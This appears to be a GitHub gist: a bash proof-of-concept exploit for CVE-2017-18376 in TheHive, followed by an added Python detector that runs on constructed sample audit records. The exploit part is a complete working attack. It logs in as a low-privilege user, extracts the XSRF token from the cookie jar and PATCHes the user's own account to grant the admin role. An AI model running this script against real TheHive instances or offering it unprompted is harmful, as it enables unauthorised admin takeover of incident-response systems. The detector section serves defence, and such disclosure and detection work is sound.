@RaJiska
Created June 19, 2019 09:25
Exploit for CVE-2017-18376
#!/bin/bash
# Author:
# Doriann "Ra'Jiska" Corlouër
# Description:
# Exploit POC for CVE-2017-18376 - https://nvd.nist.gov/vuln/detail/CVE-2017-18376
# This POC allows a TheHive user with minimal rights (read, read / write) to gain admin rights (privilege escalation)
# Setup:
# Edit the following variables:
# - THEHIVE_ROOT_URL => The URL of your TheHive instance
# - USERNAME => The username of your unprivileged account
# - PASSWORD => The password of your unprivileged account
# Execution:
# $ bash thehiveprivesc.sh
THEHIVE_ROOT_URL="https://somelink.com/thehive"
USERNAME="username"
PASSWORD="password"
COOKIE="$(/bin/mktemp --suffix=_thehivecookie)" # Cookie jar shared by every request below
CURL="/usr/bin/curl -v -c $COOKIE -b $COOKIE"   # -c writes the jar after each request, -b sends it back
$CURL "$THEHIVE_ROOT_URL" # Retrieve CSRF
$CURL "$THEHIVE_ROOT_URL/api/login" --data "{\"user\":\"$USERNAME\",\"password\":\"$PASSWORD\"}" -H 'Content-Type: application/json;charset=utf-8'
# Retrieve saved CSRF for header: the jar is in Netscape cookie format, so the cookie value is the 7th whitespace-separated field
XSRF_TOKEN=$(/bin/grep 'XSRF-TOKEN' "$COOKIE" | /usr/bin/awk '{print $7}')
# The unprivileged session patches its own user object with an extended role list
$CURL -X PATCH "$THEHIVE_ROOT_URL/api/user/$USERNAME" --data '{"roles":["read","write","admin"]}' -H "X-XSRF-TOKEN: $XSRF_TOKEN" -H 'Content-Type: application/json;charset=utf-8'
/bin/rm -f "$COOKIE"
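As an added defensive example that is not part of the gist: a small detector for the pattern the script produces, a user updating the roles on their own account, or any actor without the admin role changing roles. The record shape (operation, objectType, objectId, createdBy, details), the pre-update role table and the sample records are constructed assumptions modelled loosely on an audit trail, not TheHive's documented schema.

```python
from typing import Dict, List, Set

# Constructed sample: roles each account held before the updates below were processed.
KNOWN_ROLES: Dict[str, Set[str]] = {
    "alice": {"read", "write", "admin"},
    "bob": {"read", "write"},
    "carol": {"read"},
}

# Constructed audit-style records (field names are an assumption, not a real schema).
SAMPLE_AUDIT: List[Dict] = [
    {"operation": "Update", "objectType": "user", "objectId": "bob",
     "createdBy": "alice", "details": {"roles": ["read", "write"]}},
    {"operation": "Update", "objectType": "user", "objectId": "bob",
     "createdBy": "bob", "details": {"roles": ["read", "write", "admin"]}},
    {"operation": "Update", "objectType": "case", "objectId": "case1",
     "createdBy": "carol", "details": {"status": "Resolved"}},
    {"operation": "Update", "objectType": "user", "objectId": "carol",
     "createdBy": "alice", "details": {"roles": ["read", "write", "admin"]}},
]


def find_suspicious_role_changes(records: List[Dict], roles: Dict[str, Set[str]]) -> List[Dict]:
    """Return role updates performed by the target account itself or by a non-admin actor.

    Each hit lists why it was flagged; 'grants admin' is added as extra context when
    the update introduces the admin role the target did not previously hold.
    """
    hits = []
    for rec in records:
        if rec.get("operation") != "Update" or rec.get("objectType") != "user":
            continue
        details = rec.get("details") or {}
        if "roles" not in details:
            continue  # only role changes are of interest here
        actor, target = rec.get("createdBy"), rec.get("objectId")
        reasons = []
        if actor == target:
            reasons.append("self-modification")
        if "admin" not in roles.get(actor, set()):
            reasons.append("actor not admin")
        if not reasons:
            continue  # an admin editing someone else's roles is normal administration
        if "admin" in set(details["roles"]) and "admin" not in roles.get(target, set()):
            reasons.append("grants admin")
        hits.append({"actor": actor, "target": target, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_suspicious_role_changes(SAMPLE_AUDIT, KNOWN_ROLES):
        print(hit)
```

On the constructed sample only the second record is flagged, with all three reasons; the two updates made by the admin account are treated as routine.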